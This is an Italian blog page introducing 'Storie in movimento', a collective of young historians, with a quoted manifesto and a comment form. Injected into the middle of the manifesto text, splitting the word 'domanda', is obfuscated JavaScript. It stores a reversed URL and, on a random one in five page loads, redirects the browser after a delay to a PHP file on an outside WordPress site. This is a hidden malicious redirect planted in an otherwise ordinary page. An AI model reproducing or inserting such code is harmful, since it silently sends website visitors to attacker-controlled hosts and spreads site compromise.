Storie in movimento

image_pdfimage_print

“[..]Riconosciamo la storia come arena di conflitto e individuiamo nelle nuove forme di soggettività e nelle pratiche di antagonismo sociale e politico che hanno occupato la scena dopo Seattle una dom (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda di storia che esita a trovare interlocutori e luoghi di dibattito pubblico. [..]Storie in movimento è un laboratorio storiografico che intende rompere i confini e le distinzioni tra storia militante e pratica scientifica, tra sapere alto e divulgazione e rimettere in comunicazione luoghi e soggetti diversi attraverso cui si articola la produzione del sapere storico. Intende essere prefigurazione di una storia che nasca non solo dalla riflessione sul presente ma anche dal desiderio di essere presenti, di esercitare qualche forma di azione e di iniziativa nel presente”.
Storieinmovimento è un’associazione di giovani storici, antropologi e artisti impegnati alla realizzazione di una rivista: uno degli obiettivi è contrastare il tentativo politico di “riconciliare” gli italiani (fra loro e con il loro passato) e di “educarli” ai valori del pensiero unico liberaldemocratico, relegando la storia a mero strumento di formazione della coscienza civile nazionale.
Per informazioni e adesioni: www.storieinmovimento.org

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *